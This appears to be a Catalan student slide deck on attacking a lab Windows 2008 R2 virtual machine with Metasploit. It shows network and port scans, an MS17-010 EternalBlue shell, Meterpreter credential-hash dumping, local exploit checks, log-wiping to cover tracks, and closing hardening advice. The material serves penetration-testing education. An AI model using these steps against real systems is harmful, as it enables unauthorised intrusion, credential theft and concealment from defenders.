<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  <meta http-equiv="Content-Style-Type" content="text/css" />
  <meta name="generator" content="pandoc" />
  <meta name="author" content="Adrià Quintero Lázaro" />
  <title>Atacar amb Metasploit</title>
  <style type="text/css">
      code{white-space: pre-wrap;}
      span.smallcaps{font-variant: small-caps;}
      span.underline{text-decoration: underline;}
      div.column{display: inline-block; vertical-align: top; width: 50%;}
  </style>
  <link rel="stylesheet" type="text/css" media="screen, projection, print"
    href="https://www.w3.org/Talks/Tools/Slidy2/styles/slidy.css" />
  <link rel="stylesheet" type="text/css" media="screen, projection, print"
   href="../aux/presentacio.css" />
  <script src="https://www.w3.org/Talks/Tools/Slidy2/scripts/slidy.js"
    charset="utf-8" type="text/javascript"></script>
</head>
<body>
<div class="slide titlepage">
  <h1 class="title">Atacar amb Metasploit</h1>
  <p class="author">
Adrià Quintero Lázaro
  </p>
</div>
<div id="punts-de-la-presentació" class="slide section level1">
<h1>PUNTS DE LA PRESENTACIÓ</h1>
<ul>
<li><ol start="0" style="list-style-type: decimal">
<li>Introducció: Què és i com funciona Metasploit</li>
</ol></li>
<li><ol style="list-style-type: decimal">
<li>Atac amb Metasploit: Descobrir dispositius</li>
</ol></li>
<li><ol start="2" style="list-style-type: decimal">
<li>Atac amb Metasploit: Accedir als dispositius descoberts</li>
</ol></li>
<li><ol start="3" style="list-style-type: decimal">
<li>Atac amb Metasploit: Obtenir privilegis al sistema</li>
</ol></li>
<li><ol start="4" style="list-style-type: decimal">
<li>Atac amb Metasploit: Recollir informació del sistema</li>
</ol></li>
<li><ol start="5" style="list-style-type: decimal">
<li>Atac amb Metasploit: Netejar el rastre</li>
</ol></li>
<li><ol start="6" style="list-style-type: decimal">
<li>Conclusions: Aspectes a tenir en compte per reforçar la seguretat de la màquina</li>
</ol></li>
</ul>
</div>
<div id="què-és-metasploit" class="slide section level1">
<h1>0. QUÈ ÉS METASPLOIT?</h1>
<ul>
<li><p>Entorn de treball Open Source</p></li>
<li><p>Proporciona informació sobre les vulnerabilitats del sistema</p></li>
<li><p>Permet automatitzar diverses tasques</p></li>
<li><p>Tests de penetració i desenvolupament de signatures per als sistemes de detecció d’intrusos.</p></li>
</ul>
</div>
<div id="com-funciona-metasploit" class="slide section level1">
<h1>0. COM FUNCIONA METASPLOIT?</h1>
<ul>
<li><p>Base de dades PostgreSQL</p></li>
<li><p>Exploits</p></li>
<li><p>Mòduls</p></li>
</ul>
</div>
<div id="descobrir-dispositius" class="slide section level1">
<h1>1. DESCOBRIR DISPOSITIUS</h1>
<h2 id="ip-scan">IP scan</h2>
<ul>
<li>Exemple d’escaneig IP mitjançant mòduls (arp_sweep):</li>
</ul>
<pre><code>msf5 auxiliary(scanner/discovery/arp_sweep) &gt; run

[+] 192.168.0.1 appears to be up (UNKNOWN).
[+] 192.168.0.10 appears to be up (UNKNOWN).
[+] 192.168.0.11 appears to be up (UNKNOWN).
[+] 192.168.0.17 appears to be up (UNKNOWN).
[+] 192.168.0.21 appears to be up (CADMUS COMPUTER SYSTEMS).
[+] 192.168.0.22 appears to be up (UNKNOWN).
[+] 192.168.0.23 appears to be up (UNKNOWN).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed</code></pre>
<ul>
<li>Exemple d’escaneig IP amb Nmap:</li>
</ul>
<pre><code>msf5 &gt; db_nmap -sP 192.168.0.0/24
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 13:28 EDT
[*] Nmap: Nmap scan report for 192.168.0.1
[*] Nmap: Host is up (0.0043s latency).
...
[*] Nmap: Nmap done: 256 IP addresses (9 hosts up) scanned in 28.24 seconds</code></pre>
</div>
<div id="descobrir-dispositius-1" class="slide section level1">
<h1>1. DESCOBRIR DISPOSITIUS</h1>
<h2 id="port-scan">Port scan</h2>
<ul>
<li>Exemple d’escaneig de ports mitjançant mòduls (syn):</li>
</ul>
<pre><code>msf5 auxiliary(scanner/portscan/syn) &gt; run

[+]  TCP OPEN 192.168.0.21:22
[+]  TCP OPEN 192.168.0.21:135
[+]  TCP OPEN 192.168.0.21:139
[+]  TCP OPEN 192.168.0.21:445
[+]  TCP OPEN 192.168.0.21:3389
[+]  TCP OPEN 192.168.0.21:5985</code></pre>
<ul>
<li>Exemple d’escaneig de ports amb Nmap:</li>
</ul>
<pre><code>msf5 auxiliary(scanner/portscan/syn) &gt; db_nmap 192.168.0.21
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 10:31 EDT
[*] Nmap: Nmap scan report for 192.168.0.21
[*] Nmap: Host is up (0.0049s latency).
[*] Nmap: Not shown: 989 closed ports
[*] Nmap: PORT      STATE SERVICE
[*] Nmap: 22/tcp    open  ssh
[*] Nmap: 135/tcp   open  msrpc
...
[*] Nmap: MAC Address: 08:00:27:F7:55:D2 (Oracle VirtualBox virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 15.40 seconds</code></pre>
</div>
<div id="descobrir-dispositius-2" class="slide section level1">
<h1>1. DESCOBRIR DISPOSITIUS</h1>
<h2 id="detecció-del-sistema-operatiu-i-la-seva-versió">Detecció del sistema operatiu i la seva versió</h2>
<ul>
<li>Exemple de detecció del sistema mitjançant mòduls (smb_version):</li>
</ul>
<pre><code>msf5 auxiliary(scanner/smb/smb_version) &gt; run

[+] 192.168.0.21:445      - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:VAGRANT-2008R2) (workgroup:WORKGROUP ) (signatures:optional)
[*] 192.168.0.21:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed</code></pre>
<ul>
<li>Exemple d’escaneig dels ports i detecció del sistema amb Nmap:</li>
</ul>
<pre><code>msf5 auxiliary(scanner/smb/smb_version) &gt; db_nmap -sS -sV -O 192.168.0.21
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 10:56 EDT
[*] Nmap: Nmap scan report for 192.168.0.21
[*] Nmap: Host is up (0.00090s latency).
[*] Nmap: Not shown: 989 closed ports
[*] Nmap: PORT      STATE SERVICE      VERSION
[*] Nmap: 22/tcp    open  ssh          OpenSSH 7.1 (protocol 2.0)
...
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 84.37 seconds</code></pre>
</div>
<div id="accedir-als-dispositius-descoberts" class="slide section level1">
<h1>2. ACCEDIR ALS DISPOSITIUS DESCOBERTS</h1>
<ul>
<li><p>Revisió dels ports oberts</p></li>
<li><p>Escaneig de vulnerabilitats al port que volem atacar:</p></li>
</ul>
<pre><code>|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).</code></pre>
<ul>
<li>Aprofitar les vulnerabilitats descobertes (exploits i atacs de diccionari)</li>
</ul>
</div>
<div id="accedir-als-dispositius-descoberts-1" class="slide section level1">
<h1>2. ACCEDIR ALS DISPOSITIUS DESCOBERTS</h1>
<h2 id="atac-mitjançant-exploits">Atac mitjançant exploits</h2>
<ul>
<li>Exemple d’execució del mòdul ms17_010_eternalblue:</li>
</ul>
<pre><code>[*] Command shell session 1 opened (192.168.0.19:4444 -&gt; 192.168.0.21:49159) at 2020-05-02 08:49:38 -0400
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



C:\Windows\system32&gt;</code></pre>
</div>
<div id="accedir-als-dispositius-descoberts-2" class="slide section level1">
<h1>2. ACCEDIR ALS DISPOSITIUS DESCOBERTS</h1>
<h2 id="atac-de-diccionari">Atac de diccionari</h2>
<p align="center">
<img src="../aux/brute-force.png">
</p>
</div>
<div id="obtenir-el-control-del-dispositiu" class="slide section level1">
<h1>3. OBTENIR EL CONTROL DEL DISPOSITIU</h1>
<ul>
<li><p>Creació d’usuaris, canvis de contrasenyes i assignar permisos d’administrador</p></li>
<li><p>Veure els usuaris del sistema i obtenir informació sobre els comptes</p></li>
<li><p>Utilització de payloads</p></li>
<li><p>Escalar privilegis mitjançant Meterpreter</p></li>
<li><p>Escalar privilegis mitjançant exploits</p></li>
</ul>
</div>
<div id="recollir-informació-del-sistema" class="slide section level1">
<h1>4. RECOLLIR INFORMACIÓ DEL SISTEMA:</h1>
<ul>
<li>Extracció de contrasenyes (meterpreter):</li>
</ul>
<pre><code>meterpreter &gt; run post/windows/gather/credentials/credential_collector 

[*] Running module against VAGRANT-2008R2
[+] Collecting hashes...
    Extracted: Administrator:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: sshd:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: sshd_server:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035
    Extracted: test:aad3b435b51404eeaad3b435b51404ee:41291269bf30dc4c9270a8b888e3bbe9
    Extracted: vagrant:aad3b435b51404eeaad3b435b51404ee:41291269bf30dc4c9270a8b888e3bbe9</code></pre>
<ul>
<li><p>Descàrrega de directoris i fitxers (meterpreter)</p></li>
<li><p>Cerca de vulnerabilitats de l’equip localment:</p></li>
</ul>
<pre><code>[*] 192.168.0.21 - Collecting local exploits for x64/windows...
[*] 192.168.0.21 - 13 exploit checks are being tried...
[+] 192.168.0.21 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.0.21 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 192.168.0.21 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.0.21 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed</code></pre>
</div>
<div id="netejar-el-rastre" class="slide section level1">
<h1>5. NETEJAR EL RASTRE</h1>
<h2 id="eliminar-els-logs-a-un-sistema-windows">Eliminar els logs a un sistema Windows</h2>
<ul>
<li>Eliminació dels logs mitjançant meterpreter
<p align="center">
<img src="../aux/windows.png">
</p></li>
</ul>
</div>
<div id="netejar-el-rastre-1" class="slide section level1">
<h1>5. NETEJAR EL RASTRE</h1>
<h2 id="eliminar-els-logs-a-un-sistema-linux">Eliminar els logs a un sistema Linux</h2>
<ul>
<li>Eliminació dels logs manualment</li>
<li>Eliminació de l’historial de comandes</li>
</ul>
<p align="center">
<img src="../aux/linux.svg">
</p>
</div>
<div id="aspectes-a-tenir-en-compte-per-reforçar-la-seguretat-de-la-màquina" class="slide section level1">
<h1>6. ASPECTES A TENIR EN COMPTE PER REFORÇAR LA SEGURETAT DE LA MÀQUINA</h1>
<ul>
<li><p>Comprovació dels ports oberts</p></li>
<li><p>Servei SMB: MS17-010</p></li>
<li><p>Servei SSH</p></li>
<li><p>Servei RPC</p></li>
<li><p>Servei RDP</p></li>
</ul>
</div>
<div id="demostració-pràctica" class="slide section level1">
<h1>DEMOSTRACIÓ PRÀCTICA</h1>
</div>
</body>
</html>
